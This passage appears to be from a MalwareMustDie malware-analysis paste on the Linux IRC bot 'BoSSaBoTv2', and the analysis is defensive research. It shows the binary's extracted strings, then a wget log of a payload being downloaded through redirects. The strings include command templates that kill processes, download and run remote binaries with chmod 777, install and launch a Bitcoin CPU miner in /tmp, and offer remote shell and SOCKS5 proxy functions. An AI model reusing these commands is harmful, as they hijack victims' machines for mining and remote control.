  617. 000000007832   Enter password:
  618. 00000000786A   BoSSaBoTv2
  619. 000000007877   REMOTE
  620. 000000007880   SHELL
  621. 0000000078E0   NOTICE %s :
  622. 0000000078F4   DISCONNECTED
  623. 000000007960   NOTICE %s :
  624. 0000000079A0   NOTICE %s :
  625. 0000000079B4   SOCKET
  626. 0000000079BD   ERROR
  627. 0000000079E0   NOTICE %s :
  628. 0000000079F4   PROXY
  629. 0000000079FC   SERVER
  630. 000000007A05   READY
  631. 000000007A20   400 : BAD REQUEST
  632. 000000007A32   ONLY GET REQUESTS ARE ALLOWED
  633. 000000007A60   GET %s HTTP/1.0
  634. 000000007A71   Host: %s
  635. 000000007A7B   If-Modified-Since: %s
  636. 000000007A92   Connection: close
  637. 000000007AC0   GET %s HTTP/1.0
  638. 000000007AD1   Host: %s
  639. 000000007ADB   Connection: close
  640. 000000007B00   NOTICE %s :
  641. 000000007B14   SOCKS5
  642. 000000007B1D   SERVER
  643. 000000007B26   READY
  644. 000000007B33   PORT %d
  645. 000000007B40   export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  646. 000000007B80   NICK %s
  647. 000000007B88   USER %s localhost localhost :%s
  648. 000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
  649. 000000007C20   pkill minerd ; pkill m32 ; pkill m64
  650. 000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
  651. 000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
  652. 000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
  653. 000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
  654. 000000007E00   NOTICE %s :
  655. 000000007E1D   BoSSaBoTv2-%s
  656. 000000007E60   NOTICE %s :Nick cannot be larger than 9 characters.
  657. 000000008361   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  658. 000000008394   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  659. 0000000083C7   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  660. 0000000083FA   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  661. 00000000842D   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  662. 000000008460   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  663. 000000008493   .shstrtab
  664. 00000000849D   .interp
  665. 0000000084A5   .note.ABI-tag
  666. 0000000084B3   .hash
  667. 0000000084B9   .dynsym
  668. 0000000084C1   .dynstr
  669. 0000000084C9   .gnu.version
  670. 0000000084D6   .gnu.version_r
  671. 0000000084E5   .rel.dyn
  672. 0000000084EE   .rel.plt
  673. 0000000084F7   .init
  674. 0000000084FD   .text
  675. 000000008503   .fini
  676. 000000008509   .rodata
  677. 000000008511   .eh_frame
  678. 00000000851B   .data
  679. 000000008521   .dynamic
  680. 00000000852A   .ctors
  681. 000000008531   .dtors
  682. 000000008547   .comment
  683.  
  684. # Downloaded payload
  685. # logged:
  686.  
  687. --2014-08-26 23:25:20--  http://con32.cz.cc/4L2nJG5VxX
  688. Resolving con32.cz.cc (con32.cz.cc)... 192.95.12.34
  689. Caching con32.cz.cc => 192.95.12.34
  690. Connecting to con32.cz.cc (con32.cz.cc)|192.95.12.34|:80... connected.
  691.  
  692. GET /4L2nJG5VxX HTTP/1.1
  693.  
  694. ---response begin---
  695. HTTP/1.1 302 Found
  696. Date: Tue, 26 Aug 2014 14:24:18 GMT
  697. Server: Apache/2.4.6 (Linux/SUSE)
  698. X-Powered-By: PHP/5.4.20
  699. Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
  700. Content-Length: 0
  701. Keep-Alive: timeout=15, max=100
  702. Connection: Keep-Alive
  703. Content-Type: text/html; charset=UTF-8
  704. 302 Found
  705.  
  706. Location: http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX [following]
  707. --2014-08-26 23:25:21--  http://www.bilder-upload.eu/thumb/47f07e-1409060469.jpg/4L2nJG5VxX
  708. conaddr is: 192.95.12.34
  709. Resolving www.bilder-upload.eu (www.bilder-upload.eu)... 94.23.195.180
  710. Caching www.bilder-upload.eu => 94.23.195.180
  711. Found www.bilder-upload.eu in host_name_addresses_map (0x2880d1a0)
  712. Connecting to www.bilder-upload.eu (www.bilder-upload.eu)|94.23.195.180|:80... connected.
  713.  
  714. ---response begin---
  715. HTTP/1.1 302 Found
  716. Date: Tue, 26 Aug 2014 14:25:22 GMT
  717. Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
  718. Location: http://www.bilder-upload.eu/
  719. Vary: Accept-Encoding
  720. Content-Length: 212
  721. Keep-Alive: timeout=15, max=100
  722. Connection: Keep-Alive
  723. Content-Type: text/html; charset=iso-8859-1
  724. 302 Found
  725. URI content encoding = 'iso-8859-1'
  726. Location: http://www.bilder-upload.eu/ [following]
  727. <html><head>
  728. <title>302 Found</title>
  729. </head><body>
  730. <h1>Found</h1>
  731. <p>The document has moved <a href="http://www.bilder-upload.eu/">here</a>.</p>
  732. </body></html>
  733. ] done.
  734.  
  735. --2014-08-26 23:25:22--  http://www.bilder-upload.eu/
  736. Reusing existing connection to www.bilder-upload.eu:80.
  737.  
  738. ---request begin---
  739. GET / HTTP/1.1
  740. Accept: */*
  741. Host: www.bilder-upload.eu
  742. Connection: Keep-Alive
  743. HTTP request sent, awaiting response...
  744.  
  745. ---response begin---
  746. HTTP/1.1 200 OK
  747. Date: Tue, 26 Aug 2014 14:25:22 GMT
  748. Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
  749. X-Powered-By: PHP/5.2.6-1+lenny16
  750. Set-Cookie: PHPSESSID=2f47551d255e0b695257fc022a155c0a; path=/
  751. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  752. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  753. Pragma: no-cache
  754. Vary: Accept-Encoding
  755. Keep-Alive: timeout=15, max=99
  756. Connection: Keep-Alive
  757. Transfer-Encoding: chunked
  758. Content-Type: text/html
  759. 200 OK
  760.  
  761. Stored cookie www.bilder-upload.eu -1 (ANY) / <session> <insecure> [expiry none] PHPSESSID 2f47551d255e0b695257fc022a155c0a
  762. Length: unspecified [text/html]
  763. Saving to: '4L2nJG5VxX'
  764. 2014-08-26 23:25:23 (31.1 KB/s) - '4L2nJG5VxX' saved [8464]
  765.  
  766.  
  767. #
  768. # Downloaded the builder HTML
  769. #
  770.  
  771. >Mit dem hochladen der Datei akzeptieren Sie unsere AGB.<
  772. </form>
  773.  
  774.  
  775. ----
  776. #MalwareMustDie!
RAW Paste Data
Top